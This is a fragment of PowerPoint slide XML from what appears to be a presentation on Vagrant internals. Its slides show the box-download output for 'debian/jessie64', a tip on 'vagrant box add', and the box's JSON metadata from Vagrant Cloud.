              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="90805" marR="1440815" indent="-78105">
              <a:lnSpc>
                <a:spcPct val="101499"/>
              </a:lnSpc>
            </a:pP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==</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>&gt; default: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>Box 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’debian/jessie64’ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>could not </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="10" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>be </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>found.  default: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>Box </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>Provider:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="90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virtualbox</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="9080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default: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>Box Version: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>&gt;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=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill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1A177D"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="90805" marR="1331595" indent="-78105">
              <a:lnSpc>
                <a:spcPts val="1100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="35"/>
              </a:spcBef>
            </a:pP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==</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>&gt; default: Loading metadata </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007F00"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>box 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’debian/jessie64’  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>default: URL:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-45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https://vagrantcloud.com/debian/jessie64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ts val="1050"/>
              </a:lnSpc>
            </a:pP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==</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>&gt; default: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>Adding </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>box 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’debian/jessie64’ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007F00"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>provider:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="1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virtualbox</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="9080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default: Downloading:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="7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https://atlas.hashicorp.com/debian/jessie64/virtualbox.box</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9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</a:pPr>
            <a:r>
              <a:rPr sz="900" spc="-125" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>Tip: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-100" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Only </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-90" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>want </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-65" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-85" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>download </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-110" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-90" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>box </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-70" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>without </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-75" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>starting </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-65" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>it? </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-125" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-80" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>vagrant </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>box add &lt;box&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="114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[url]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900" spc="-100" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>command.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pc="-55" dirty="0"/>
              <a:t>24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417" y="190436"/>
            <a:ext cx="1871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sz="1200" spc="-150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INTERNALS </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-215" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-295" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-185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DOWNLOAD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9905" y="1478695"/>
            <a:ext cx="144199" cy="1442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7247" y="1715550"/>
            <a:ext cx="144194" cy="1442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8589" y="699201"/>
            <a:ext cx="4394200" cy="2232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20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Metadata</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="75565" marR="1821814" indent="-63500">
              <a:lnSpc>
                <a:spcPts val="700"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pP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{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# </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>Content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of https://vagrantcloud.com/debian/jessie64.json  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”description”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>: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”Vanilla Debian 8 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="BA2121"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>\”Jessie\””</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>,  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”name”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>: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”debian/jessie64”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:endParaRPr sz="600">
              <a:latin typeface="LM Roman 6"/>
              <a:cs typeface="LM Roman 6"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="75565">
              <a:lnSpc>
                <a:spcPts val="660"/>
              </a:lnSpc>
            </a:pP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”versions”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>:</a:t>
            </a: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[</a:t>
            </a:r>
            <a:endParaRPr sz="600">
              <a:latin typeface="LM Roman 6"/>
              <a:cs typeface="LM Roman 6"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="139065">
              <a:lnSpc>
                <a:spcPts val="710"/>
              </a:lnSpc>
            </a:pP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{</a:t>
            </a:r>
            <a:endParaRPr sz="600">
              <a:latin typeface="LM Roman 6"/>
              <a:cs typeface="LM Roman 6"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="202565">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pP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”version”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>: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”8.5.1”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>,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#</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="135" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>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1</a:t>
            </a:r>
            <a:endParaRPr sz="600">
              <a:latin typeface="LM Roman 6"/>
              <a:cs typeface="LM Roman 6"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="202565">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="160"/>
              </a:spcBef>
            </a:pP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”status”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>: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”active”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:endParaRPr sz="600">
              <a:latin typeface="LM Roman 6"/>
              <a:cs typeface="LM Roman 6"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="202565">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="265"/>
              </a:spcBef>
            </a:pP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”providers”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>:</a:t>
            </a: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[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#</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="135" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>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2</a:t>
            </a:r>
            <a:endParaRPr sz="600">
              <a:latin typeface="LM Roman 6"/>
              <a:cs typeface="LM Roman 6"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="265430">
              <a:lnSpc>
                <a:spcPts val="710"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="195"/>
              </a:spcBef>
            </a:pP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{</a:t>
            </a:r>
            <a:endParaRPr sz="600">
              <a:latin typeface="LM Roman 6"/>
              <a:cs typeface="LM Roman 6"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="328930" marR="5080">
              <a:lnSpc>
                <a:spcPts val="700"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="30"/>
              </a:spcBef>
            </a:pP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”name”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>: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”virtualbox”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>,  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”url”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>: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”https://atlas.hashicorp.com/debian/boxes/jessie64/versions/8.5.1/providers/virtualbox.box”</a:t>
            </a:r>
            <a:endParaRPr sz="600">
              <a:latin typeface="LM Roman 6"/>
              <a:cs typeface="LM Roman 6"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="265430">
              <a:lnSpc>
                <a:spcPts val="665"/>
              </a:lnSpc>
            </a:pP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}</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:endParaRPr sz="600">
              <a:latin typeface="LM Roman 6"/>
              <a:cs typeface="LM Roman 6"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="265430">
              <a:lnSpc>
                <a:spcPts val="700"/>
              </a:lnSpc>
            </a:pP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{</a:t>
            </a:r>
            <a:endParaRPr sz="600">
              <a:latin typeface="LM Roman 6"/>
              <a:cs typeface="LM Roman 6"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="328930" marR="307340">
              <a:lnSpc>
                <a:spcPts val="700"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="25"/>
              </a:spcBef>
            </a:pP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”name”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>: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”lxc”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>,  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”url”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>: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”https://atlas.hashicorp.com/debian/boxes/jessie64/versions/8.5.1/providers/lxc.box”</a:t>
            </a:r>
            <a:endParaRPr sz="600">
              <a:latin typeface="LM Roman 6"/>
              <a:cs typeface="LM Roman 6"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="265430">
              <a:lnSpc>
                <a:spcPts val="665"/>
              </a:lnSpc>
            </a:pP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}</a:t>
            </a:r>
            <a:endParaRPr sz="600">
              <a:latin typeface="LM Roman 6"/>
              <a:cs typeface="LM Roman 6"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="202565">
              <a:lnSpc>
                <a:spcPts val="695"/>
              </a:lnSpc>
            </a:pP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]</a:t>
            </a:r>
            <a:endParaRPr sz="600">
              <a:latin typeface="LM Roman 6"/>
              <a:cs typeface="LM Roman 6"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="139065">
              <a:lnSpc>
                <a:spcPts val="700"/>
              </a:lnSpc>
            </a:pP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}</a:t>
            </a:r>
            <a:endParaRPr sz="600">
              <a:latin typeface="LM Roman 6"/>
              <a:cs typeface="LM Roman 6"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="75565">
              <a:lnSpc>
                <a:spcPts val="695"/>
              </a:lnSpc>
            </a:pP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]</a:t>
            </a:r>
            <a:endParaRPr sz="600">
              <a:latin typeface="LM Roman 6"/>
              <a:cs typeface="LM Roman 6"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPts val="710"/>
              </a:lnSpc>
            </a:pP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}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6546" y="3170661"/>
            <a:ext cx="97790" cy="1130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600" spc="-60" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>25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589" y="699198"/>
            <a:ext cx="13671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80" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Why </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-105" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>people </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-120" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>are </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-105" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>using</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-235" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074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E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>it?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5714" y="1255396"/>
            <a:ext cx="2158365" cy="1483995"/>
            <a:chOff x="875714" y="1255396"/>
            <a:chExt cx="2158365" cy="1483995"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="object 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1780908" y="1779645"/>
              <a:ext cx="786786" cy="9592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43500" y="2574765"/>
              <a:ext cx="387985" cy="133350"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="387985" h="133350">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="64295" y="47231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104810" y="70079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147209" y="89412"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="191493" y="105230"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237662" y="117532"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="285716" y="126320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="335656" y="131592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="387481" y="133349"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="512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74379" y="2361067"/>
              <a:ext cx="171685" cy="2162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43473" y="1390332"/>
              <a:ext cx="387985" cy="133985"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="387985" h="133984">
                  <a:moveTo>
                    <a:pt x="0" y="133375"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="64322" y="86121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104837" y="63273"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147236" y="43940"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="191520" y="28121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237689" y="15818"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="285743" y="7030"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="335683" y="1757"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="387508" y="0"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="512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74379" y="1521143"/>
              <a:ext cx="171658" cy="2162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8209" y="2363632"/>
              <a:ext cx="554355" cy="344805"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="554355" h="344805">
                  <a:moveTo>
                    <a:pt x="554037" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="526709" y="47455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="497497" y="91395"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="466402" y="131819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="433424" y="168728"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="398562" y="202122"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="361816" y="232000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="323186" y="258364"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="282671" y="281212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="240272" y="300544"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="195988" y="316362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="149819" y="328664"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101765" y="337452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51825" y="342724"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="344482"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="512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5714" y="2568023"/>
              <a:ext cx="407578" cy="795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8209" y="1390332"/>
              <a:ext cx="554355" cy="344805"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="554355" h="344805">
                  <a:moveTo>
                    <a:pt x="554037" y="344474"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="526709" y="297023"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="497497" y="253086"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="466402" y="212663"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="433424" y="175756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="398562" y="142363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="361816" y="112485"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="323186" y="86121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="282671" y="63273"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="240272" y="43940"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="195988" y="28121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="149819" y="15818"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101765" y="7030"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51825" y="1757"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="512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3570" y="1255396"/>
              <a:ext cx="313594" cy="1025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3107778" y="2571233"/>
            <a:ext cx="624890" cy="763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00908" y="1255394"/>
            <a:ext cx="496150" cy="789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417" y="190436"/>
            <a:ext cx="1871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sz="1200" spc="-150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INTERNALS </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-215" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-295" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-185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DOWNLOAD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9905" y="1478695"/>
            <a:ext cx="144199" cy="1442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7247" y="1715550"/>
            <a:ext cx="144194" cy="1442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299" y="2966728"/>
            <a:ext cx="188958" cy="1889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8589" y="699201"/>
            <a:ext cx="4394200" cy="2449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20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Metadata</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
